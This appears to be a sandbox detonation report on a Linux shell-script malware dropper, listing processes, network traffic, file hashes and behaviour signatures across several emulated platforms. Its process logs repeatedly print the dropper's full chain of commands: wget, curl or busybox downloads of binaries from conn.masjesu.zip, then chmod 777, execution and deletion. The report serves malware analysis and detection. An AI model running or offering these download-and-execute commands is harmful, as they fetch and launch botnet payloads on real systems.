[wget http://conn.masjesu.zip/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP]

/bin/chmod

[chmod 777 NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP]

/tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP

[./NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP]

/bin/rm

[rm NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf]

/bin/chmod

[chmod 777 oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf]

/tmp/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf

[./oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf]

/bin/rm

[rm oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU]

/bin/chmod

[chmod 777 NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU]

/tmp/NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU

[./NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU]

/bin/rm

[rm NCcJ5hH8wNAdrlWjWs48R1HElg3Bq85JoU]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU]

/bin/chmod

[chmod 777 v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU]

/tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU

[./v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU]

/bin/rm

[rm v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]

/bin/chmod

[chmod 777 wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]

/tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N

[./wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]

/bin/rm

[rm wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3]

/bin/chmod

[chmod 777 yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3]

/tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3

[./yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3]

/bin/rm

[rm yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ]

/bin/chmod

[chmod 777 ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ]

/tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ

[./ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ]

/bin/rm

[rm ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O]

/bin/chmod

[chmod 777 JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O]

/tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O

[./JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O]

/bin/rm

[rm JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp

Files

/tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-18 02:06

Reported

2024-10-18 02:08

Platform

ubuntu1804-amd64-20240729-en

Max time kernel

148s

Max time network

128s

Command Line

[/tmp/840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh]

Signatures

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh

[/tmp/840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]

Network

Country Destination Domain Proto
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
N/A 224.0.0.251:5353 udp
GB 89.187.167.39:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 89.187.167.38:443 1527653184.rsc.cdn77.org tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-18 02:06

Reported

2024-10-18 02:08

Platform

debian9-armhf-20240611-en

Max time kernel

149s

Max time network

2s

Command Line

[/tmp/840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh

[/tmp/840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-18 02:06

Reported

2024-10-18 02:08

Platform

debian9-mipsbe-20240611-en

Max time kernel

149s

Max time network

31s

Command Line

[/tmp/840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N /tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N N/A
N/A /tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3 /tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3 N/A
N/A /tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU /tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N /usr/bin/curl N/A
File opened for modification /tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3 /usr/bin/curl N/A
File opened for modification /tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU /usr/bin/curl N/A

Processes

/tmp/840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh

[/tmp/840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]

/bin/chmod

[chmod 777 wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]

/tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N

[./wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]

/bin/rm

[rm wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3]

/bin/chmod

[chmod 777 yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3]

/tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3

[./yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3]

/bin/rm

[rm yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU]

/bin/chmod

[chmod 777 v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU]

/tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU

[./v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU]

/bin/rm

[rm v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

/tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97